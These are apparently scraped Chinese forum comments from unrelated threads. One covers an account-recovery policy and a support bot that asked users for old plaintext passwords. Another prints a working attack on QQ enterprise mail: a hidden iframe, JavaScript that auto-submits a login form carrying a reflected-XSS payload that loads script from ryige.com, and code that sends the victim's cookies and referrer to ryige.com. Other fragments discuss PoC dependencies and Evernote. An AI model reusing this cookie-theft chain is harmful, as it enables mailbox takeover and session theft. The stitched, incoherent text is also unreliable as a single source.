@okletswin 不是依赖一条做找回评判的，楼主提到的也只是第五条，综合评判：

①常用登陆地
②账号绑定的手机号和邮箱号
.......
⑧所使用过的昵称+相应时间
⑨常用游览器&插件（包括第三方插件）
⑩邮箱已失效的证明截图（可证明邮箱运营商已停运）

针对帖子中提出的问题：『用户是否明文存储密码、客服智能姬关于绑定信息失效（手机 /邮箱）无法登陆的情况需要让用户发送历史上使用的明文密码』，我们第一时间进行了跟进和解决，结果如下：

- 用户密码确定加密存储
- 由于申诉问题需要多方信息的对比综合评测，在一定情况下人工参与是必要存在的
- 关于客服智能姬系统中询问用户历史上使用过的密码的方式，确实存在安全隐患，现已修改为：曾经通过何种方式修改过密码加相应时间（ PC 端修改 或 移动端修改）

感谢反馈！

什么明文密码什么脱裤...怎么不动脑子的那么多？

题主提到的二步认证现在被小范围用于被风控的账号中，例如存在弱口令或撞库风险的账号。

<img src="test">

http://iscxy.com/index.php?s=/Index/me&id=699-1
http://iscxy.com/index.php?s=/Index/me&id=699

嗯 分享一个 SQLi

嗯，刚才测试了一下，如果你的企业邮箱在登录情况下访问了如上网址，是可以登录你的邮箱。

@BOYPT

两个 iframe ，一些常见网站是人民网的分享接口进行的访问，不是攻击者。

另外一个 iframe 是进行攻击者的操作：

<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>

<iframe src="/htmlpage5.html" style="display:none"></iframe>

---------------

function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
});


document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};

nice

@Owenjia 脚本获取 py 依赖，手工对一些进行处理。

@Owenjia
准备在之后的版本加入 PoC 依赖自动安装第三方依赖

@Owenjia nice

如果你想安全点儿，可能印象笔记更好一些。